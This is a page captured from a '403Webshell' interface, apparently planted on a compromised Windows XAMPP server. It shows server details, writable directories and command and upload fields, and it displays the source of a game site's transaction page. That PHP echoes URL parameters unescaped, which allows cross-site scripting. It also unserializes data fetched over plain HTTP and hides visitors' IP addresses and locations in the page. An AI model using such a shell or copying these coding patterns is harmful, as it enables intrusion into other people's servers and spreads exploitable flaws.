403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xampp/htdocs-coblaa/BM_game/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : D:/xampp/htdocs-coblaa/BM_game/bm_transaction.php
<html>

<head>
<title>BMG Transcation</title>
<link rel="icon" type="image/jpg" href="https://coblaa.com/cb_image/main_icon/coot_icon.png"  />
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/bm_transaction.css?v1" />


</head>

<div style="display:none;">
<?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];

/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/
$curr_day = date("d");
$curr_month = date("m");
$curr_year = date("Y");
?> 
<input type="text" id="user_ip" value="<?php echo"$user_ip";?>" style="display:none;" />
<input type="text" id="user_city" value="<?php echo"$city";?>" style="display:none;" />
<input type="text" id="user_country" value="<?php echo"$country";?>" style="display:none;" />
</div>
<?php 
session_start();
include('db.php'); 

if(isset($_SESSION['my_id']))
{
$user_id = $_SESSION['my_id'];

}else{
	
echo"<script>window.open('login','_self')</script>";
}

?>
</span>
<input id="my_id" value="<?php echo $user_id ?>" style="display:none;" />

<body id="main_body" >

<div class="main_home_div" >
<img src="main_icon/back_btn.png" Onclick="history.back();" class="back_btn" />
<span class="main_home_title">Transcations</span>

</div>
<div class="main_home_div_position" ></div>

<div idk="main_content_div" class="main_content_div">


<div id="disp_purch_no_output" ></div>
<?php
if(isset($_GET['trans_id'])){
	$trans_id = $_GET['trans_id'];

?>
<input id="trans_id" value="<?php echo $trans_id ?>" class="help_input" />

<script>

disp_purch_no();
function disp_purch_no()
{
	trans_id = document.getElementById('trans_id').value;
	my_id = document.getElementById('my_id').value;

	xmlhttp = new XMLHttpRequest(); 
    xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&trans_id="+trans_id+"&&status=disp_purch_no",false);
    xmlhttp.send(null);
    document.getElementById('disp_purch_no_output').innerHTML =xmlhttp.responseText; 
   // document.getElementById('sales_list_output').style.display="none";

}


</script>



<?php }else if(isset($_GET['sale_tran_id'])){
	$sale_tran_id = $_GET['sale_tran_id']; ?> 
	
<input id="sale_tran_id" value="<?php echo $sale_tran_id ?>" class="help_input" />

<script>

disp_trans_deatail_sale();
function disp_trans_deatail_sale()
{
	sale_tran_id = document.getElementById('sale_tran_id').value;
	my_id = document.getElementById('my_id').value;

	xmlhttp = new XMLHttpRequest(); 
    xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&sale_tran_id="+sale_tran_id+"&&status=disp_trans_deatail_sale",false);
    xmlhttp.send(null);
    document.getElementById('disp_purch_no_output').innerHTML =xmlhttp.responseText; 
    document.getElementById('sales_list_output').style.display="none";

}


</script>	
	

<?php }else{ ?>
<div class="sale_lebal_div">

<span class="sub_lebal_sale"></span>
<span class="sub_lebal_sale2">Product</span>
<span class="sub_lebal_sale3">Points</span>


<span class="sub_lebal_sale3">Date</span>


</div>
<div id="sales_list_output" ></div>

<script>




disp_sales_list();
function disp_sales_list()
{
	my_id = document.getElementById('my_id').value;
    main_search="";
	xmlhttp = new XMLHttpRequest(); 
    xmlhttp.open("GET","autopage.php?my_id="+my_id+"&&status=disp_sales_list",false);
    xmlhttp.send(null);
    document.getElementById('sales_list_output').innerHTML =xmlhttp.responseText; 
    document.getElementById('sales_list_output').style.display="block";
 
}






</script>


 <?php } ?>


</div>







</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit